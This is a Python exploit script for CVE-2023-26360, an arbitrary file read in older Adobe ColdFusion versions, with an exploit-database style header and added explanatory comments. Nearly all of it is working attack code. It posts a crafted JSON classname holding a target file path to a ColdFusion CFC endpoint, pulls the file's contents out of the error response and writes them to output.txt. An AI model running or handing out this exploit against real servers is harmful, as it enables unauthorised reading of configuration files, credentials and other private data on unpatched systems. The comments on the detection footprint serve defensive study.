FlyFar

Adobe ColdFusion versions 2018,15 and 2021,5 and earlier - Arbitrary File Read - CVE-2023-26360

Mar 12th, 2024
# Exploit Title: Arbitrary File Read Exploit for CVE-2023-26360
# Google Dork: [not]
# Date: [12/28/2023]
# Exploit Author: [Youssef Muhammad]
# Vendor Homepage: [https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html]
# Software Link: [https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0]
# Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and earlier]
# Tested on: [Windows, Linux]
# CVE : [CVE-2023-26360]
  13.  
  14. import sys
  15. import requests
  16. import json
  17.  
# ASCII-art banner printed once at startup by print_banner(); the glyphs
# appear to spell out the CVE identifier named in the file header.
BANNER = """
  ██████ ██    ██ ███████       ██████   ██████  ██████  ██████        ██████   ██████  ██████   ██████   ██████  
 ██      ██    ██ ██                 ██ ██  ████      ██      ██            ██ ██            ██ ██       ██  ████
 ██      ██    ██ █████   █████  █████  ██ ██ ██  █████   █████  █████  █████  ███████   █████  ███████  ██ ██ ██
 ██       ██  ██  ██            ██      ████  ██ ██           ██       ██      ██    ██      ██ ██    ██ ████  ██
  ██████   ████   ███████       ███████  ██████  ███████ ██████        ███████  ██████  ██████   ██████   ██████                                                                                                                                                                                                                                      
"""
  25.  
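# ANSI SGR escape sequences for terminal colouring. Every sequence must start
# with ESC, which is octal 033.
RED_COLOR = "\033[91m"    # bright red foreground
# Fixed: the original began with octal 032 (SUB) instead of 033 (ESC), so the
# terminal would not have interpreted it as a colour code.
GREEN_COLOR = "\033[42m"  # green background
RESET_COLOR = "\033[0m"   # clear all attributes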
  29.  
def print_banner():
    """Print the banner in red with a credit line appended, then reset the colour.

    Returns:
        0, always.
    """
    credit_line = "                  Developed by SecureLayer7"
    print(f"{RED_COLOR}{BANNER}{credit_line}{RESET_COLOR}")
    return 0
  33.  
def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None):
    """Send one crafted POST to a ColdFusion CFC endpoint and save the text returned ahead of an error-page marker.

    Proof of concept for CVE-2023-26360 as described in this file's header,
    which lists ColdFusion 2018 update 15 and earlier and 2021 update 5 and
    earlier as affected; servers on later updates fall outside that range.

    Args:
        host: Base URL. It is concatenated with ``endpoint`` as-is, with no
            separator added and no validation.
        target_file: Path placed in the JSON ``classname`` field. A value
            ending in ``.cfc`` is rejected.
        endpoint: Path of the CFC to call; ``.cfc`` is appended if missing.
        proxy_url: Optional proxy applied to both http and https traffic.

    Raises:
        ValueError: If ``target_file`` ends in ``.cfc``, or if the response is
            not a 404/500 whose body contains the marker string.

    Side effects:
        Prints the recovered text and overwrites ``output.txt`` in the
        current working directory.
    """
    if not endpoint.endswith('.cfc'):
        endpoint += '.cfc'

    if target_file.endswith('.cfc'):
        raise ValueError('The TARGET_FILE must not point to a .cfc')

    # The path is prefixed with "a/" and sent in the `_metadata.classname`
    # key, i.e. in a field whose name suggests a component class name.
    targeted_file = f"a/{target_file}"
    json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []})

    # Footprint of this request in web-server / WAF logs, for detection:
    # a POST to a `.cfc` URL with query string `method=test&_cfclient=true`
    # and a form field `_variables` holding JSON in which
    # `_metadata.classname` is a file path. The endpoint is caller-chosen,
    # so the parameter and field names are the more reliable thing to match.
    vars_get = {'method': 'test', '_cfclient': 'true'}
    uri = f'{host}{endpoint}'

    # NOTE(review): no timeout is passed, so this call can block indefinitely
    # on an unresponsive host.
    response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None)

    file_data = None
    # Marker searched for in the response body; only the text before it is
    # kept. Presumably the start of the server's error page - confirm against
    # a captured response.
    splatter = '<!-- " ---></TD></TD></TD></TH></TH></TH>'

    # Success is recognised only on an error status (404 or 500) that also
    # contains the marker; any other response, including a 200, is a failure.
    if response.status_code in [404, 500] and splatter in response.text:
        file_data = response.text.split(splatter, 1)[0]

    if file_data is None:
        # NOTE(review): CFC_ENDPOINT, CFC_METHOD and CFC_METHOD_PARAMETERS are
        # not options of this script; the message looks carried over from
        # another tool.
        raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.')

    print(file_data)

    # Save the output to a file
    # The name is fixed, so an existing output.txt is overwritten; the file is
    # opened with the platform's default text encoding.
    output_file_name = 'output.txt'
    with open(output_file_name, 'w') as output_file:
        output_file.write(file_data)
        print(f"The output saved to {output_file_name}")
  65.  
if __name__ == "__main__":
    # argv[0] is the script itself, so two required arguments plus up to two
    # optional ones give a length between 3 and 5.
    if len(sys.argv) < 3 or len(sys.argv) > 5:
        print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]")
        sys.exit(1)

    print_banner()

    # Pad the optional positions with None so all four values unpack at once.
    host, target_file, endpoint, proxy_url = (sys.argv[1:] + [None, None])[:4]
    if endpoint is None:
        endpoint = "/CFIDE/wizards/common/utils.cfc"

    # Any failure is reported as a single line rather than a traceback.
    try:
        run_exploit(host, target_file, endpoint, proxy_url)
    except Exception as e:
        print(f"Error: {e}")
  82.            